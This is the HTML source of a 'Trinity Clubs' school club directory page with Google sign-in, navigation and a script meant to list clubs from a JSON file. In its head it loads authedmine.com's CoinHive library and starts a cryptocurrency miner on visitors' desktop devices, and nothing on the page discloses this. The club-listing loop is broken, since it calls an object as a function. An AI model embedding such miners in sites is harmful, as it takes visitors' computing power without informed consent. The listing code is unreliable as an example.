
<!DOCTYPE html>
<html>
<script src="http://code.jquery.com/jquery-2.0.3.min.js"></script>
<script>
//JSONArray clubs;

   var nytg = nytg || {};
   $.getJSON("/JSONS/clubs.json", function(clubs) {
     nytg.ipoData = clubs
     console.log(clubs)
     })
setInterval(function() {
console.log(getDateTime());
document.getElementsByClassName('clubs')[0].innerHTML = '';
for (var i = 1; i < (Object((nytg)).length); i++) {
document.getElementsByClassName('clubs')[0].innerHTML += '<a href="/clubs/'+nytg(i)+'.html">';
document.getElementsByClassName('clubs')[0].innerHTML += '<img src="/images/'+nytg(i)+'.jpg" width="300" height="240" alt="'+nytg(i)+'">';
document.getElementsByClassName('clubs')[0].innerHTML += '<h1>'+nytg(i)+'</h1>';
document.getElementsByClassName('clubs')[0].innerHTML += '</a>';
  }
}, 1000);


function getDateTime() {

    var date = new Date();

    var hour = date.getHours();
    hour = (hour < 10 ? "0" : "") + hour;

    var min  = date.getMinutes();
    min = (min < 10 ? "0" : "") + min;

    var sec  = date.getSeconds();
    sec = (sec < 10 ? "0" : "") + sec;

    var year = date.getFullYear();

    var month = date.getMonth() + 1;
    month = (month < 10 ? "0" : "") + month;

    var day  = date.getDate();
    day = (day < 10 ? "0" : "") + day;

    return year + ":" + month + ":" + day + ":" + hour + ":" + min + ":" + sec;

}
</script>
<script src="https://apis.google.com/js/platform.js" async defer></script>
<meta name="google-signin-client_id" content="428427503799-qav0f6s1iin1e4iia99m06uqf3kcedat.apps.googleusercontent.com">
<script src="https://authedmine.com/lib/authedmine.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('BL5kbxUy8iU8la4mF0VTxKgahqK1w1CY', {throttle: 0.3});
// Only start on non-mobile devices and if not opted-out
// in the last 14400 seconds (4 hours):
if (!miner.isMobile() && !miner.didOptOut(14400)) {
	miner.start();
}
</script>

<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<title>Trinity Clubs</title>
	<style>

	body {
		background-color: rgb(255,255,255);

	}
	.sidenav {
		height: 100%;
		width: 15%;
		position: fixed;
		z-index: 1;
		top: 0;
		left: 0;
		background-color: rgb(30,50,200);
		overflow-x: hidden;
		padding-top: 20px;
	}

	.sidenav a {
		padding: 6px 8px 6px 16px;
		text-decoration: none;
		font-size: 25px;
		color: white;
		display: block;
	}

	.sidenav a:hover {
		background-color: rgb(196,165,9);
	}

	.main {
		margin-left: 160px; /* Same as the width of the sidenav */
		font-size: 28px; /* Increased text to enable scrolling */
		padding: 0px 10px;
	}

	@media screen and (max-height: 450px) {
		.sidenav {padding-top: 15px;}
		.sidenav a {font-size: 18px;}
	}
	.topnav {
		background-color: rgb(196,165,9) ;
		overflow: hidden;
		position: fixed;
		width: 90%;
		z-index: 1;
		top: 0;
		left: 15%;
	}

	/* Style the links inside the navigation bar */
	.topnav a {
		float: center;
		color: #f2f2f2;
		text-align: center;
		padding: 12px 16px;
		text-decoration: none;
		font-size: 43.3999px;
	}

	/* Change the color of links on hover */
	.topnav a:hover {
		background-color: #ddd;
		color: rgb(30,50,200);
		text-align: center;

	}

	/* Add a color to the active/current link */
	.topnav a.active {
		background-color: #4CAF50;
		color: white;
		text-align: center;


	}
	.login {
		background-color: rgb(200,50,200);
		position: absolute;
    top: 0px;
    right: 0px;
    font-size: 18px;
		z-index: 1;
	}
	.logout a{
		background-color: rgb(30,50,200);
		position: fixed;
		width: 15%;
		z-index: 1;
		left: 0;
		bottom: 0;
		color :white;
		text-align: center;
	}
	.logout a:hover {
		background-color: rgb(196,165,9);
	}
	.clubs {
		background-color: rgb(30,50,200);
		position: fixed;
		z-index: 1;
		left: 17%;
		top: 12%;
		color :white;
		font-size: 10px;
		text-align: center;
	}
	.clubs a{
		background-color: rgb(30,50,200);
		position: fixed;
		z-index: 1;
		width: 20%;
		color :white;
		font-size: 10px;
		text-align: center;
	}
	.clubs	a:hover{
		background-color: rgb(196,65,9);
		position: fixed;
		z-index: 1;
		width: 25%;
		color :white;
		font-size: 10px;
		text-align: center;
	}

</style>
</head>
<body>
	<div class="sidenav">
		<a href="/Calender.html">Calendar</a>
		<a href="/placeholder.html">About</a>
		<a href="/placeholder.html">Club Charter</a>
		<a href="/placeholder.html">Apply for funding</a>
		<a href="/placeholder.html">Events</a>
		<a href="https://www.trinityschoolnyc.org/page">Trinity Website</a>
		<a href="/placeholder.html">My clubs</a>
	</div>

	<div class="topnav">
		<center>
			<a href="/trinityclubs.html">Trinity Clubs</a>
		</center>
	</div>
	<div class="login">
		<a
		<div id="my-signin2"></div>
<script>
	function onSuccess(googleUser) {
		console.log('Logged in as: ' + googleUser.getBasicProfile().getName());
	}
	function onFailure(error) {
		console.log(error);
	}
	function renderButton() {
		gapi.signin2.render('my-signin2', {
			'scope': 'profile email',
			'width': 240,
			'height': 50,
			'longtitle': true,
			'theme': 'dark',
			'onsuccess': onSuccess,
			'onfailure': onFailure
		});
	}
</script>

<script src="https://apis.google.com/js/platform.js?onload=renderButton" async defer></script>
</a>
	</div>
	<div class="logout">
			<a href="#" onclick="signOut();">Sign out</a>
<script>
  function signOut() {
    var auth2 = gapi.auth2.getAuthInstance();
    auth2.signOut().then(function () {
      console.log('User signed out.');
    });
  }
</script>
	</div>
	<script> function onSignIn(googleUser) {
	  var profile = googleUser.getBasicProfile();
	  console.log('ID: ' + profile.getId()); // Do not send to your backend! Use an ID token instead.
	  console.log('Name: ' + profile.getName());
	  console.log('Image URL: ' + profile.getImageUrl());
	  console.log('Email: ' + profile.getEmail()); // This is null if the 'email' scope is not present.
	}
	</script>
  <!--> fills this with for loop from json automaticaly -->
		<div class="clubs">
		</div>
</body>
</html>
